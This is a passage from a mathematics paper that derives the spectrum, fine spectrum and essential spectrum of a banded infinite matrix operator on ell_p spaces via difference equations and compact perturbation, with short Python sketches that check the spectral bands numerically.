the essential spectrum of \(T_{0}\)) being devoid of its eigenvalues are also derived. This helps us to characterize the point spectrum of \(T.\) Theory of difference equations plays an important role in our study. We use various results on the asymptotic behaviour of solutions of difference equations to demonstrate the findings of our paper. For more details on difference equations one can refer [12]. The remainder of paper is organized as follows: section 2 is devoted to introduce some terminologies and results which are relevant to our work. Section 3 contains the results on the spectrum and fine spectrum of \(T_{0}\) over \(\ell_{p}.\) The spectral properties of \(T\) are discussed in section 4. ## 2. **Preliminaries** Let \(X\) and \(Y\) are Banach spaces and for any operator \(T:X\to Y\), \(N(T)\) and \(R(T)\) denote the null space and range space of \(T\) respectively. The operator \(T^{*}:Y^{*}\to X^{*}\) is called the adjoint operator and defined by \[(T^{*}f)(x)=f(Tx)\quad\text{for all $f\in Y^{*}$and $x\in X$}\] where \(X^{*}\), \(Y^{*}\) are the dual spaces of \(X\) and \(Y\) respectively. \(B(X)\) denotes the set of all bounded linear operators from \(X\) to itself. For any \(T\in B(X)\), the resolvent set \(\rho(T,X)\) of \(T\) is the set of all \(\lambda\) in the complex plane such that \((T-\lambda I)\) has a bounded inverse in \(X\) where \(I\) is the identity operator defined over \(X\). The complement of resolvent set in the complex plane \(\mathbb{C}\) is called the spectrum of \(T\) and it is denoted by \(\sigma(T,X)\). The spectrum \(\sigma(T,X)\) can be partitioned into three disjoint sets which are 1. the point spectrum, denoted by \(\sigma_{p}(T,X),\) is the set of all such \(\lambda\in\mathbb{C}\) for which \((T-\lambda I)^{-1}\) does not exist. An element \(\lambda\in\sigma_{p}(T,X)\) is called an eigenvalue of \(T,\) 2. 
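The two-band structure of the spectrum of \(T_{0}\) stated above can also be seen numerically. In the sketch below (the values of \(r_{1},r_{2},s_{1},s_{2}>0\) are our own illustrative choices) the odd- and even-indexed coordinates of a symmetric truncation of \(T_{0}\) decouple into two free Jacobi blocks, and the computed eigenvalues fill the intervals \([r_{1}-2s_{1},r_{1}+2s_{1}]\) and \([r_{2}-2s_{2},r_{2}+2s_{2}]\).

```python
import numpy as np

r1, r2, s1, s2 = 0.0, 5.0, 0.5, 1.0        # illustrative values with s1, s2 > 0
N = 1000
n = np.arange(1, N + 1)
a = np.where(n % 2 == 1, r1, r2)           # r1, r2, r1, r2, ...
s = np.where(np.arange(1, N - 1) % 2 == 1, s1, s2)   # s1, s2, s1, s2, ...
T0 = np.diag(a) + np.diag(s, k=2) + np.diag(s, k=-2)  # symmetric truncation of T_0

ev = np.linalg.eigvalsh(T0)
I1 = (ev >= r1 - 2*s1 - 1e-9) & (ev <= r1 + 2*s1 + 1e-9)
I2 = (ev >= r2 - 2*s2 - 1e-9) & (ev <= r2 + 2*s2 + 1e-9)
assert np.all(I1 | I2)                     # every eigenvalue lies in one of the two bands
print("band 1:", ev[I1].min(), ev[I1].max())   # approaches [r1 - 2 s1, r1 + 2 s1]
print("band 2:", ev[I2].min(), ev[I2].max())   # approaches [r2 - 2 s2, r2 + 2 s2]
```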
the continuous spectrum, denoted by \(\sigma_{c}(T,X),\) is the set of all such \(\lambda\in\mathbb{C}\) for which \((T-\lambda I)^{-1}\) is exists, unbounded and the domain of \((T-\lambda I)^{-1}\) is dense in \(X\) but \(R(T-\lambda I)\neq X,\) 3. the residual spectrum, denoted by \(\sigma_{r}(T,X),\) is the set of all such \(\lambda\in\mathbb{C}\) for which \((T-\lambda I)^{-1}\) exists (and may be bounded or not) but the domain of \((T-\lambda I)^{-1}\) is not dense in \(X.\) These three disjoint sets are together known as fine spectrum and their union becomes the whole spectrum. There are some other important subdivisions of the spectrum such as approximate point spectrum \(\sigma_{app}(T,X),\) defect spectrum \(\sigma_{\delta}(T,X)\) and compression spectrum \(\sigma_{co}(T,X),\) defined by \[\sigma_{app}(T,X) = \{\lambda\in\mathbb{C}:\ (T-\lambda I)\text{ is not bounded below}\},\] \[\sigma_{\delta}(T,X) = \{\lambda\in\mathbb{C}:(T-\lambda I)\text{ is not surjective}\}\,,\] \[\sigma_{co}(T,X) = \left\{\lambda\in\mathbb{C}:\overline{R(T-\lambda I)}\neq X \right\}.\] The sets which are defined above also forms subdivisions of spectrum of \(T\) which are not necessarily disjoint as follows \[\sigma(T,X) = \sigma_{app}(T,X)\cup\sigma_{co}(T,X),\] \[\sigma(T,X) = \sigma_{app}(T,X)\cup\sigma_{\delta}(T,X).\] An operator \(T\in B(X)\) is said to be Fredholm operator if \(R(T)\) is closed and \(\dim(N(T)),\)\(\dim(X/R(T))\) are finite. In this case the number \[\dim(N(T))-\dim(X/R(T))\] is called the index of the Fredholm operator \(T\). The essential spectrum of \(T\) is defined by the set \[\sigma_{ess}(T,\ell_{p})=\{\lambda\in\mathbb{C}:(T-\lambda I)\text{ is not a Fredholm operator}\}\,.\] If \(T\) is a Fredholm operator and \(K\in B(X)\) is a compact operator then \(T+K\) is also a Fredholm operator with same indices. Since compact perturbation does not effect the Fredholmness and index of a Fredholm operator, we have \[\sigma_{ess}(T,X)=\sigma_{ess}(T+K,X).\] For any isolated eigenvalue \(\lambda\) of \(T,\) the operator \(P_{T}\) which is defined by \[P_{T}(\lambda)=\frac{1}{2\pi i}\int_{\gamma}(\mu I-T)^{-1}d\mu,\] is called the Riesz projection of \(T\) with respect to \(\lambda\) where \(\gamma\) is positively orientated circle centred at \(\lambda\) with sufficiently small radius such that it excludes other spectral values of \(T.\) An eigenvalue \(\lambda\) of \(T\) is said to be a discrete eigenvalue if it is isolated and the rank of the associated Riesz projection is finite. The rank of the Riesz projection is called the algebraic multiplicity of \(\lambda\). The set of all such eigenvalues with finite multiplicities is called the discrete spectrum of \(T\) and it is denoted by \(\sigma_{d}(T,X).\) This type of eigenvalues sometimes referred as eigenvalues with finite type. In the following proposition, we mention some inclusion relation of spectrum of a bounded linear operator and its adjoint operator. **Proposition 2.1**.: [5, p.195] If \(X\) is a Banach space and \(T\in B(X)\), \(T^{*}\in B(X^{*})\) then the spectrum and subspectrum of \(T\) and \(T^{*}\) are related by the following relations: 1. \(\sigma(T^{*},X^{*})=\sigma(T,X)\). 2. \(\sigma_{c}(T^{*},X^{*})\subseteq\sigma_{app}(T,X)\). 3. \(\sigma_{app}(T^{*},X^{*})=\sigma_{\delta}(T,X)\). 4. \(\sigma_{\delta}(T^{*},X^{*})=\sigma_{app}(T,X)\). 5. \(\sigma_{p}(T^{*},X^{*})=\sigma_{co}(T,X)\). 6. \(\sigma_{co}(T^{*},X^{*})\supseteq\sigma_{p}(T,X)\). 7. 
\(\sigma(T,X)=\sigma_{app}(T,X)\cup\sigma_{p}(T^{*},X^{*})=\sigma_{p}(T,X)\cup\sigma_{app}(T^{*},X^{*})\). Here we record a few lemmas related to the boundedness of an infinite matrix acting on sequence spaces, which are useful for our study. **Lemma 2.2**.: [8, p. 253] The matrix \(A=(a_{nk})\) gives rise to a bounded linear operator \(T\in B(\ell_{1})\) from \(\ell_{1}\) to itself if and only if the supremum of the \(\ell_{1}\) norms of the columns of \(A\) is bounded. **Lemma 2.3**.: [8, p. 245] The matrix \(A=(a_{nk})\) gives rise to a bounded linear operator \(T\in B(\ell_{\infty})\) from \(\ell_{\infty}\) to itself if and only if the supremum of the \(\ell_{1}\) norms of the rows of \(A\) is bounded. **Lemma 2.4**.: [8, p. 254] The matrix \(A=(a_{nk})\) gives rise to a bounded linear operator \(T\in B(\ell_{p})(1<p<\infty)\) if \(T\in B(\ell_{1})\cap B(\ell_{\infty})\). ## 3. **Spectra of \(T_{0}\)** As already mentioned, we study the spectral properties of \(T\) by using the spectral properties of \(T_{0}\) and the compact perturbation technique. In this section we derive the spectrum and fine spectrum of \(T_{0}\). The notation \(\|T\|_{p}\) denotes the operator norm of an operator \(T\in B(\ell_{p})\) where \(1\leq p\leq\infty\). **Theorem 3.1**.: The operator \(T_{0}:\ell_{p}\to\ell_{p}\) is a bounded linear operator which satisfies the following inequality \[\left(\frac{|r_{1}|^{p}+|r_{2}|^{p}+|s_{1}|^{p}+|s_{2}|^{p}}{2}\right)^{\frac{1}{p}}\leq\left\|T_{0}\right\|_{p}\leq\left(3^{p-1}\left(|r_{1}|^{p}+2|s_{1}|^{p}+|r_{2}|^{p}+2|s_{2}|^{p}\right)\right)^{\frac{1}{p}}.\] Proof.: Since the linearity of \(T_{0}\) is trivial, we omit its verification. Let \(e=(1,1,0,0,...)\in\ell_{p}\). Then \(T_{0}(e)=(r_{1},r_{2},s_{1},s_{2},0,...)\) and one can observe that \[\frac{\left\|T_{0}(e)\right\|_{p}}{\left\|e\right\|_{p}}=\left(\frac{|r_{1}|^{p}+|r_{2}|^{p}+|s_{1}|^{p}+|s_{2}|^{p}}{2}\right)^{\frac{1}{p}}.\] This proves \[\left(\frac{|r_{1}|^{p}+|r_{2}|^{p}+|s_{1}|^{p}+|s_{2}|^{p}}{2}\right)^{\frac{1}{p}}\leq\left\|T_{0}\right\|_{p}.\] Also, let \(x=\{x_{n}\}\in\ell_{p}\) and \(x_{n}=0\) if \(n\leq 0\). Then, \[\|T_{0}(x)\|_{p}^{p}= \sum_{n=1}^{\infty}|s_{1}x_{2n-3}+r_{1}x_{2n-1}+s_{1}x_{2n+1}|^{p}+ \sum_{n=1}^{\infty}|s_{2}x_{2n-2}+r_{2}x_{2n}+s_{2}x_{2n+2}|^{p}\] \[\leq \sum_{n=1}^{\infty}(|s_{1}x_{2n-3}|+|r_{1}x_{2n-1}|+|s_{1}x_{2n+1}|)^{p}+\sum_{n=1}^{\infty}(|s_{2}x_{2n-2}|+|r_{2}x_{2n}|+|s_{2}x_{2n+2}|)^{p}.\] By Jensen's inequality we get, \[\|T_{0}(x)\|_{p}^{p}\leq 3^{p-1}\sum_{n=1}^{\infty}\left(|s_{1}x_{2n-3}|^{p}+|r_{1}x_{2n-1}|^{p}+|s_{1}x_{2n+1}|^{p}\right)\] \[+ 3^{p-1}\sum_{n=1}^{\infty}\left(|s_{2}x_{2n-2}|^{p}+|r_{2}x_{2n}|^{p}+|s_{2}x_{2n+2}|^{p}\right)\] \[\leq 3^{p-1}\left(|r_{1}|^{p}+2|s_{1}|^{p}+|r_{2}|^{p}+2|s_{2}|^{p}\right)\|x\|_{p}^{p}.\] This implies \[\|T_{0}\|_{p}\leq\left(3^{p-1}\left(|r_{1}|^{p}+2|s_{1}|^{p}+|r_{2}|^{p}+2|s_{2}|^{p}\right)\right)^{\frac{1}{p}}.\] This completes the proof. The following theorem proves the non-existence of eigenvalues of the operator \(T_{0}\) in \(\ell_{p}\). **Theorem 3.2**.: The point spectrum of \(T_{0}\) is given by \(\sigma_{p}(T_{0},\ell_{p})=\emptyset\). Proof.: Consider \((T_{0}-\lambda I)x=0\) for \(\lambda\in\mathbb{C}\) and \(x=\{x_{n}\}\in\mathbb{C}^{\mathbb{N}}\). 
This gives the following system of equations \[\left.\begin{array}{ll}(r_{1}-\lambda)x_{1}+s_{1}x_{3}&=0\\ (r_{2}-\lambda)x_{2}+s_{2}x_{4}&=0\\ s_{1}x_{1}+(r_{1}-\lambda)x_{3}+s_{1}x_{5}&=0\\ s_{2}x_{2}+(r_{2}-\lambda)x_{4}+s_{2}x_{6}&=0\\ &\vdots\\ s_{1}x_{2n-1}+(r_{1}-\lambda)x_{2n+1}+s_{1}x_{2n+3}&=0\\ s_{2}x_{2n}+(r_{2}-\lambda)x_{2n+2}+s_{2}x_{2n+4}&=0\\ &\vdots\end{array}\right\}\] We assume that \(x_{1}\neq 0\) and \(x_{2}\neq 0\) otherwise \(x_{n}=0\) for all \(n\in\mathbb{N}.\) Let us consider two sequences \(\{y_{n}\}\) and \(\{z_{n}\}\) where \(y_{n}=x_{2n-1}\) and \(z_{n}=x_{2n}\), \(n\in\mathbb{N}\) respectively. Then the system of equations of \((T_{0}-\lambda I)x=0\) reduces to \[y_{n}+p_{1}y_{n+1}+y_{n+2}=0, \tag{3.1}\] \[z_{n}+p_{2}z_{n+1}+z_{n+2}=0, \tag{3.2}\] where \(p_{1}=\frac{r_{1}-\lambda}{s_{1}},\)\(p_{2}=\frac{r_{2}-\lambda}{s_{2}},\)\(n\in\mathbb{N}\cup\{0\}\) and \(y_{0}=z_{0}=0\). The general solution of the difference equation (3.1) is given by \[y_{n}=\left\{\begin{array}{rl}&(c_{1}+nc_{2})(-1)^{n},\ \ \mbox{if}\ p_{1}=2\\ &c_{1}+nc_{2},\ \ \mbox{if}\ p_{1}=-2\\ &c_{1}\alpha_{1}^{n}+c_{2}\alpha_{2}^{n},\ \ \mbox{if}\ p_{1}\notin\{-2,2\} \end{array}\right. \tag{3.3}\] where \(c_{1},\)\(c_{2}\) are arbitrary constants and \(\alpha_{1},\)\(\alpha_{2}\) are the roots of the polynomial \[y^{2}+p_{1}y+1=0 \tag{3.4}\] which is called the characteristic polynomial of (3.1). The following two equalities \[\alpha_{1}\alpha_{2}=1\ \mbox{and}\ \alpha_{1}+\alpha_{2}=-p_{1}\] are useful. There are three cases to be considered. Case 1: If \(p_{1}=2\) (i.e., \(\lambda=r_{1}-2s_{1}\)). In this case the general solution of (3.1) is \[y_{n}=(c_{1}+c_{2}n)(-1)^{n},\ n\in\mathbb{N}\cup\{0\}\] with the initial condition \(y_{0}=0\) which gives \(c_{1}=0.\) This reduces the solution as \(y_{n}=nc_{2}(-1)^{n}.\) This also implies \(c_{2}=-y_{1}\) and the solution in this case is \[y_{n}=ny_{1}(-1)^{n+1},\ n\in\mathbb{N}.\] Case 2: If \(p_{1}=-2\) (i.e., \(\lambda=r_{1}+2s_{1}\)). Similar as Case 1, the solution reduces to \[y_{n}=ny_{1},\ n\in\mathbb{N}.\] Case 3: If \(p_{1}\notin\{-2,2\}.\) The general solution of (3.1) is given by \[y_{n}=c_{1}\alpha_{1}^{n}+c_{2}\alpha_{2}^{n}.\] With the help of initial condition \(y_{0}=0\) and by using the equalities \(\alpha_{1}\alpha_{2}=1,\)\(\alpha_{1}+\alpha_{2}=-p_{1},\) one can obtain that \(c_{2}=-c_{1}\) and the solution reduces to \[y_{n}=\frac{\alpha_{1}^{n}-\alpha_{2}^{n}}{\alpha_{1}-\alpha_{2}}y_{1},\ n\in \mathbb{N}.\] If \(y_{1}\neq 0\) then \(\{y_{n}\}\notin\ell_{p}\) in Case 1 and Case 2. In Case 3 \(\{y_{n}\}\in\ell_{p}\) if and only if \(|\alpha_{1}|<1\) and \(|\alpha_{2}|<1\) which can not be the case since \(\alpha_{1}\alpha_{2}=1.\) Hence in all the three cases \(\{y_{n}\}\in\ell_{p}\) if and only if \(y_{1}=0\) and this leads to the trivial solution of the difference equation (3.1). Hence there is no non-trivial solution of (3.1). Similarly for the difference equation (3.2), the general solution \(\{z_{n}\}\) is of the form \[z_{n}=\left\{\begin{array}{rl}&(d_{1}+nd_{2})(-1)^{n},\ \ \mbox{if}\ p_{2}=2\\ &d_{1}+nd_{2},\ \ \mbox{if}\ p_{2}=-2\\ &d_{1}\beta_{1}^{n}+d_{2}\beta_{2}^{n},\ \ \mbox{if}\ p_{2}\notin\{-2,2\} \end{array}\right. \tag{3.5}\] where \(d_{1},\)\(d_{2}\) are arbitrary constants and \(\beta_{1},\)\(\beta_{2}\) are the roots of the polynomial \[z^{2}+p_{2}z+1=0 \tag{3.6}\] which is called the characteristic polynomial of difference equation (3.2). 
In a similar way, it can be proved that \(\{z_{n}\}\in\ell_{p}\) if and only if \(z_{1}=0\), and this leads to the trivial solution of (3.2). Hence, there does not exist any non-trivial solution of the system \((T_{0}-\lambda I)x=0\) such that \(x\in\ell_{p}.\) This proves the required result. _Remark 3.3_.: The solution \(x=\{x_{n}\}\) of the system \(Tx=\lambda x\), which is obtained in terms of the sequences \(\{y_{n}\}\) and \(\{z_{n}\}\) in the equations (3.3) and (3.5) respectively, actually depends on the unknown \(\lambda.\) Therefore, instead of writing \(x_{n}(\lambda)\), we write \(x_{n}\) for the sake of brevity throughout this paper, except in Theorem 4.6 where the dependency of the solutions on \(\lambda\) is vital. It is well known that the adjoint operator \(T_{0}^{*}\) of \(T_{0}\) is defined over the sequence space \(\ell_{p}^{*}\), where \(\ell_{p}^{*}\) denotes the dual space of \(\ell_{p}\), which is isomorphic to \(\ell_{q}\) with \(\frac{1}{p}+\frac{1}{q}=1.\) **Corollary 3.4**.: The point spectrum of the adjoint operator \(T_{0}^{*}\) over the sequence space \(\ell_{p}^{*}\) is given by \(\sigma_{p}(T_{0}^{*},\ell_{p}^{*})=\emptyset.\) Proof.: It is well known that the adjoint operator \({T_{0}}^{*}:\ell_{p}^{*}\to\ell_{p}^{*}\) is represented by the transpose of the matrix \(T_{0}\). Since \(T_{0}\) is represented by a symmetric matrix, using the same argument as in Theorem 3.2, it is easy to prove that \(\sigma_{p}(T_{0}^{*},\ell_{p}^{*})=\emptyset.\) **Corollary 3.5**.: The residual spectrum of \(T_{0}\) over the sequence space \(\ell_{p}\) is given by \(\sigma_{r}(T_{0},\ell_{p})=\emptyset.\) Proof.: We know that the operator \(T\) has a dense range if and only if \(T^{*}\) is one-to-one [5, p.197]. Using this, we have the following relation \[\sigma_{r}(T_{0},\ell_{p})=\sigma_{p}(T_{0}^{*},\ell_{p}^{*})\setminus\sigma_{p}(T_{0},\ell_{p}).\] Hence, \(\sigma_{r}(T_{0},\ell_{p})=\emptyset.\) Next, we obtain the spectrum of \(T_{0}\). **Theorem 3.6**.: The spectrum of \(T_{0}\) is given by \[\sigma(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}].\] **Corollary 3.7**.: The continuous spectrum of \(T_{0}\) is given by \[\sigma_{c}(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}].\] Proof.: Since \(\sigma(T_{0},\ell_{p})\) is the disjoint union of \(\sigma_{p}(T_{0},\ell_{p})\), \(\sigma_{r}(T_{0},\ell_{p})\) and \(\sigma_{c}(T_{0},\ell_{p})\), we have \[\sigma(T_{0},\ell_{p})=\sigma_{c}(T_{0},\ell_{p}).\] Hence, \(\sigma_{c}(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}].\) **Corollary 3.8**.: The essential spectrum of \(T_{0}\) is given by \[\sigma_{ess}(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}].\] Proof.: It is well known that \(\sigma_{c}(T_{0},\ell_{p})\subseteq\sigma_{ess}(T_{0},\ell_{p})\), and we have \[\sigma_{ess}(T_{0},\ell_{p})\subseteq\sigma(T_{0},\ell_{p})=\sigma_{c}(T_{0},\ell_{p})\subseteq\sigma_{ess}(T_{0},\ell_{p}).\] The desired result follows. Using the relations mentioned in Proposition 2.1, we can easily obtain the following results. **Corollary 3.9**.: The compression spectrum, approximate point spectrum and defect spectrum of \(T_{0}\) are as follows: 1. \(\sigma_{co}(T_{0},\ell_{p})=\emptyset.\) 2. \(\sigma_{app}(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}].\) 3. \(\sigma_{\delta}(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}].\)
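As a quick numerical illustration of Theorem 3.6 (and, for \(p=2\), of the lower bound in Theorem 3.1), one may truncate \(T_{0}\) to a large finite section and inspect its eigenvalues. The sketch below is an illustrative addition and not part of the original argument; the values of \(r_{1},r_{2},s_{1},s_{2}\) are arbitrary sample choices.

```python
import numpy as np

# Finite truncation of T_0; r1, r2, s1, s2 are arbitrary sample values.
r1, r2, s1, s2 = 1.0, -0.5, 0.3, 0.2
n = 2000

T0 = np.zeros((n, n))
for i in range(n):                                # i = 0 corresponds to the first row/column
    T0[i, i] = r1 if i % 2 == 0 else r2           # diag(D_3') = {r1, r2, r1, r2, ...}
    if i + 2 < n:
        s = s1 if i % 2 == 0 else s2              # off-diagonals from S_r^2 D_1' and D_2' S_l^2
        T0[i, i + 2] = s
        T0[i + 2, i] = s

eig = np.linalg.eigvalsh(T0)                      # the truncation is symmetric
print(eig.min(), eig.max())
# For large n the eigenvalues fill out [r1-2s1, r1+2s1] U [r2-2s2, r2+2s2],
# in line with Theorem 3.6 (here: [0.4, 1.6] U [-0.9, -0.1]).

# Lower bound of Theorem 3.1, checked for p = 2 on the truncation:
lower = ((abs(r1)**2 + abs(r2)**2 + abs(s1)**2 + abs(s2)**2) / 2) ** 0.5
print(np.linalg.norm(T0, 2) >= lower)             # True
```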
## 4. **Spectra of \(T=T_{0}+K\)** This section contains the spectral properties of \(T\), which can be expressed as \(T=T_{0}+K\) where \(K=T-T_{0}\) is represented by the following matrix \[K=\begin{pmatrix}a_{1}-r_{1}&0&b_{1}-s_{1}&0&0&\cdots\\ 0&a_{2}-r_{2}&0&b_{2}-s_{2}&0&\cdots\\ c_{1}-s_{1}&0&a_{3}-r_{1}&0&b_{3}-s_{1}&\cdots\\ 0&c_{2}-s_{2}&0&a_{4}-r_{2}&0&\cdots\\ 0&0&c_{3}-s_{1}&0&a_{5}-r_{1}&\cdots\\ \vdots&\vdots&\vdots&\vdots&\vdots&\ddots\end{pmatrix}.\] The following result proves the compactness of \(K\) on \(\ell_{p}\). **Theorem 4.1**.: The operator \(K\) is a compact operator on \(\ell_{p}\). Proof.: The operator \(K\) on \(\ell_{p}\) can be represented by the following infinite matrix \[K=\begin{pmatrix}u_{1}&0&v_{1}&0&0&\cdots\\ 0&u_{2}&0&v_{2}&0&\cdots\\ w_{1}&0&u_{3}&0&v_{3}&\cdots\\ 0&w_{2}&0&u_{4}&0&\cdots\\ \vdots&\vdots&\vdots&\vdots&\vdots&\ddots\end{pmatrix},\] where \(\{u_{n}\}\), \(\{v_{n}\}\) and \(\{w_{n}\}\) are null sequences defined as follows: \[u_{n}=\begin{cases}a_{n}-r_{1},\ n\text{ is odd}\\ a_{n}-r_{2},\ n\text{ is even},\end{cases}\qquad v_{n}=\begin{cases}b_{n}-s_{1},\ \ n\text{ is odd}\\ b_{n}-s_{2},\ n\text{ is even}\end{cases}\] and \[w_{n}=\begin{cases}c_{n}-s_{1},\ \ n\text{ is odd}\\ c_{n}-s_{2},\ n\text{ is even}.\end{cases}\] Let \(x=\{x_{1},x_{2},x_{3},...\}\in\ell_{p}\). We construct a sequence of compact operators \(\{K_{n}\}\) such that for \(i\in\mathbb{N}\), \[(K_{n}(x))_{i}=\begin{cases}(Kx)_{i},\ i=1,2,...,n\\ 0,\ \text{otherwise}.\end{cases}\] For \(n\geq 2\), \[\left\|(K-K_{n})x\right\|_{p}= \left(\sum_{k=n-1}^{\infty}\left|w_{k}x_{k}+u_{k+2}x_{k+2}+v_{k+2}x_{k+4}\right|^{p}\right)^{\frac{1}{p}}\] \[\leq \left(\sup_{k\geq n-1}\left|w_{k}\right|\right)\left\|x\right\|_{p}+\left(\sup_{k\geq n-1}\left|u_{k}\right|\right)\left\|x\right\|_{p}+\left(\sup_{k\geq n-1}\left|v_{k}\right|\right)\left\|x\right\|_{p}.\] This implies \[\left\|K-K_{n}\right\|_{p}\ \leq\sup_{k\geq n-1}\left|w_{k}\right|+\sup_{k\geq n-1}\left|u_{k}\right|+\sup_{k\geq n-1}\left|v_{k}\right|.\] Thus, \(\{K_{n}\}\) converges to \(K\) as \(n\to\infty\) in operator norm and hence \(K\) is a compact operator over \(\ell_{p}\). Next, we derive an inclusion relation between \(\sigma(T_{0},\ell_{p})\) and \(\sigma(T,\ell_{p})\). **Theorem 4.2**.: The spectrum of \(T\) satisfies the following inclusion relation \[\sigma(T_{0},\ell_{p})\subseteq\sigma(T,\ell_{p})\] and \(\sigma(T,\ell_{p})\setminus\sigma(T_{0},\ell_{p})\) contains a finite or countable number of eigenvalues of \(T\) of finite type with no accumulation point in \(\sigma(T,\ell_{p})\setminus\sigma(T_{0},\ell_{p})\). **Corollary 4.3**.: \(\sigma_{ess}(T,\ell_{p})=\sigma(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\)_._ Proof.: Since a compact perturbation does not affect the Fredholmness and index of a Fredholm operator, we have \(\sigma_{ess}(T_{0},\ell_{p})=\sigma_{ess}(T,\ell_{p})\). Hence, by using Corollary 3.8, we have \[\sigma_{ess}(T,\ell_{p})=\sigma(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}].\] We now focus on the point spectrum of \(T\). First, we analyze the eigenvalues of \(T\) lying in \(\sigma_{ess}(T,\ell_{p})=\sigma(T_{0},\ell_{p})\); in particular, we derive sufficient conditions for the absence of point spectrum on \(\sigma_{ess}(T,\ell_{p})\). 
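The stability of the essential spectrum under the compact perturbation \(K\) (Theorem 4.2 and Corollary 4.3) can also be visualized numerically. The sketch below is an illustration with arbitrary sample data, not part of the original argument: the sequences \(a_{n},b_{n},c_{n}\) converge exponentially fast to limits of the form \(r_{1},r_{2}\) and \(s_{1},s_{2}\), and a large truncation of \(T\) exhibits the two bands of \(\sigma(T_{0},\ell_{p})\) together with at most a few isolated outliers (candidate eigenvalues of finite type).

```python
import numpy as np

# Arbitrary sample data: a_n, b_n, c_n converge exponentially fast to r1/r2 and s1/s2.
r1, r2, s1, s2 = 1.0, -0.5, 0.3, 0.2
n = 2000
idx = np.arange(1, n + 1)
decay = np.exp(-0.5 * idx)
a = np.where(idx % 2 == 1, r1, r2) + 2.0 * decay
b = np.where(idx % 2 == 1, s1, s2) + 1.0 * decay
c = np.where(idx % 2 == 1, s1, s2) - 1.0 * decay

T = np.zeros((n, n))
T[np.arange(n), np.arange(n)] = a                  # a_n on the diagonal
T[np.arange(n - 2), np.arange(2, n)] = b[:n - 2]   # b_n two places to the right
T[np.arange(2, n), np.arange(n - 2)] = c[:n - 2]   # c_n two places to the left

eig = np.linalg.eigvals(T)
in_bands = (np.abs(eig - r1) <= 2 * s1 + 1e-2) | (np.abs(eig - r2) <= 2 * s2 + 1e-2)
print("outliers:", np.sort_complex(eig[~in_bands]))
# Only a handful of isolated values (if any) lie outside
# [r1-2s1, r1+2s1] U [r2-2s2, r2+2s2]; the rest fill out the two intervals,
# heuristically matching Theorem 4.2 and Corollary 4.3.
```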
In Theorem 4.4, sufficient conditions are provided in terms of the rate of convergence of the sequences \(\{a_{2n-1}\},\ \{a_{2n}\},\ \{b_{2n-1}\},\ \{b_{2n}\},\ \{c_{2n-1}\}\) and \(\{c_{2n}\}\). Sufficient conditions for the absence of point spectrum on \(\sigma_{ess}(T,\ell_{p})\) are also provided in Theorem 4.5, in terms of the entries of the matrix \(T\). **Theorem 4.4**.: If the convergence of the sequences \(\{a_{2n-1}\},\ \{a_{2n}\},\ \{b_{2n-1}\},\ \{b_{2n}\},\ \{c_{2n-1}\}\) and \(\{c_{2n}\}\) is exponentially fast, then \[\sigma_{ess}(T,\ell_{p})\cap\sigma_{p}(T,\ell_{p})=\emptyset.\] In the next theorem, we apply the transfer matrix approach as discussed in [15, 16]. This enables us to examine the sufficient condition for the absence of point spectrum in the essential spectrum of \(T\) in terms of the entries of the matrix \(T\). **Theorem 4.5**.: If \(\lambda\in\sigma_{ess}(T,\ell_{p})\) satisfies either of the following conditions (i) \(\sum_{n=1}^{\infty}\prod_{j=1}^{n}\left[\frac{1}{2}\left(P_{j}(\lambda)-\sqrt{P_{j}(\lambda)^{2}-\left|\frac{2c_{2j+1}}{b_{2j+1}}\right|^{2}}\right)\right]^{\frac{1}{2}}=+\infty\) or (ii) \(\sum_{n=1}^{\infty}\prod_{j=1}^{n}\left[\frac{1}{2}\left(Q_{j}(\lambda)-\sqrt{Q_{j}(\lambda)^{2}-\left|\frac{2c_{2j+2}}{b_{2j+2}}\right|^{2}}\right)\right]^{\frac{1}{2}}=+\infty\) where \[P_{j}(\lambda)=\left|\frac{c_{2j-1}}{b_{2j+1}}\right|^{2}+\left|\frac{a_{2j+1}-\lambda}{b_{2j+1}}\right|^{2}+1,\ Q_{j}(\lambda)=\left|\frac{c_{2j}}{b_{2j+2}}\right|^{2}+\left|\frac{a_{2j+2}-\lambda}{b_{2j+2}}\right|^{2}+1,\] then \(\lambda\notin\sigma_{p}(T,\ell_{p})\). Now we focus our study on the point spectrum of \(T\). Under the sufficient conditions mentioned in the previous two results, we have \(\sigma_{p}(T,\ell_{p})\cap\sigma(T_{0},\ell_{p})=\emptyset\). In this case, all the eigenvalues of \(T\) lie outside the set \(\sigma(T_{0},\ell_{p})\). To characterize the eigenvalues, let \(Tx=\lambda x\), \(x\in\mathbb{C}^{\mathbb{N}}\) and \(\lambda\in\sigma(T_{0},\ell_{p})^{c}\), where \(\sigma(T_{0},\ell_{p})^{c}\) denotes the complement of \(\sigma(T_{0},\ell_{p})\). Proceeding as with equations (3.1) and (3.2) in Theorem 3.2, we have the following system \[c_{2n-1}y_{n}+(a_{2n+1}-\lambda)y_{n+1}+b_{2n+1}y_{n+2}=0, \tag{4.1}\] \[c_{2n}z_{n}+(a_{2n+2}-\lambda)z_{n+1}+b_{2n+2}z_{n+2}=0, \tag{4.2}\] where \(n\in\mathbb{N}\cup\{0\}\) with \(y_{0}=z_{0}=0\) and \(y_{n}=x_{2n-1}\), \(z_{n}=x_{2n}\). Clearly each of the difference equations (4.1) and (4.2) has two fundamental solutions. Let \(\{y_{n}^{(1)}(\lambda),y_{n}^{(2)}(\lambda)\}\) and \(\{z_{n}^{(1)}(\lambda),z_{n}^{(2)}(\lambda)\}\) be the sets of fundamental solutions of the equations (4.1) and (4.2) respectively. Under this setting we have the following result: **Theorem 4.6**.: If either of the sufficient conditions mentioned in Theorem 4.4 and Theorem 4.5 holds true, then the point spectrum of \(T\) 